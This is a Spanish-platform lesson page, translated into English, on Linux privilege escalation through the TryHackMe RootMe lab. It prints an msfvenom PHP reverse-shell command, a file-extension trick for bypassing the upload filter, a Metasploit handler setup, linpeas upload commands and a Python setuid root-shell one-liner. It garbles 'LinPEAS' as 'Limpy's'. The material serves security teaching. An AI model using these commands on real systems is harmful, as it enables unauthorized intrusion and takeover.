Try Hack Me > RootMe
GTFOBins > Reune todos los binarios de Linux para poder aprovecharlos en la escalada de privilegios.
Introducci贸n a la Escalada de Privilegios
Comienza a escalar privilegios en Linux, Windows y aplicaciones web
Qu茅 es la escalada de privilegios
Estrategias de escalada de privilegios
Creaci贸n y delegaci贸n de privilegios en sistemas operativos
Escalada de privilegios en dispositivos m贸viles
Escalada de Privilegios Horizontal
Keylogging
SQL Injection para Login Bypass
Password Cracking
Broken Access Control
Password Guessing
Ingenier铆a social
Escalada de Privilegios Vertical
Sudo Security Bypass
Linpeas
Cracking de llaves SSH privadas con John the Ripper
Escalada de Privilegios con Binarios
Winpeas
Despedida
Contin煤a Aprendiendo de Hacking de Aplicaciones Web
You don't have access to this class
Keep learning! Join and start boosting your career
In the exciting world of cybersecurity, the ability to escalate privileges on a Linux system can be a powerful and necessary tool. In this lesson, we will address how to use tools to accomplish this task, specifically through the use of Metasploit and Limpy's. We will explore each step in a clear manner, providing a thorough understanding of the techniques employed.
To begin, it is important to understand the concept of privilege escalation. It refers to the process by which an unprivileged user acquires full access to a system, allowing him to perform restricted operations. We start with the analysis of the virtual system, for which we will use a TryHackMe machine, specifically the RootMe machine.
Starting the virtual machine: We start by starting the TryHackMe virtual machine and obtaining the necessary IP address.
Environment configuration: We use Kali Linux to browse the virtual machine and explore the available routes and services. Tools like Nmap and DirBuster are essential for this preliminary information process.
The next essential step is to obtain a shell on the system. A shell allows us to execute remote commands on the server. To achieve this, different paths can be followed:
File upload: Through a web application observable from the virtual machine, we find a vulnerable point that allows file uploads. Exploiting this vulnerability is crucial.
Creation of a malicious PHP file: We use Metasploit and its MSFVenom tool to create a PHP file. This file, when executed, will provide us with a shell connection.
msfvenom -p php/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw > shell.php
Upload the file and bypass protections: If there is a simple filter that blocks PHP files, we rename the file to shell.phtml
or shell.php5
to bypass these restrictions.
Connection with Metasploit: We configure a handler in Metasploit to wait for incoming connections.
use exploit/multi/handlerset payload php/meterpreter_reverse_tcpset LHOST <YOUR_IP>set LPORT 4444
With a Meterpreter shell already set up, we move on to analyze the system for privilege escalation paths using Limpy's.
UploadLimpy's to the system: We use Meterpreter to transfer and run the Limpy's script, which will scan the system for vulnerabilities.
upload /home/kali/Desktop/linpeas.sh /tmp/linpeas.shchmod +x /tmp/linpeas.sh/tmp/linpeas.sh
Identify scaling vectors: Limpy's provides a list of possible scaling vectors, including binaries that can be run with elevated privileges.
GTFOBins is an excellent source that details how to use Linux binaries to escalate privileges. In the case of identifying the Python binary as executable:
GTFOBins query: we look for the specific binary to obtain the escalation command. For Python, the following command allows us to obtain a shell with root privileges.
python -c 'import os; os.setuid(0); os.system("/bin/sh")'
Execute in the shell: In our shell obtained through Meterpreter, we execute the command and verify the user change.
whoami
If the execution is successful, the system should indicate that we are now root
.
This systematic approach is not only a great example of how to deal with ethical cybersecurity situations, but also provides the basis for further exploration and learning in this fascinating field.
Contributions 4
Questions 0
Try Hack Me > RootMe
GTFOBins > Reune todos los binarios de Linux para poder aprovecharlos en la escalada de privilegios.
https://www.revshells.com/ esta pagina tambi茅n puede ser de ayuda para crear reverse shell, as铆 como lo que hizo para el archivo php
use exploit/multi/handler
Want to see more contributions, questions and answers from the community?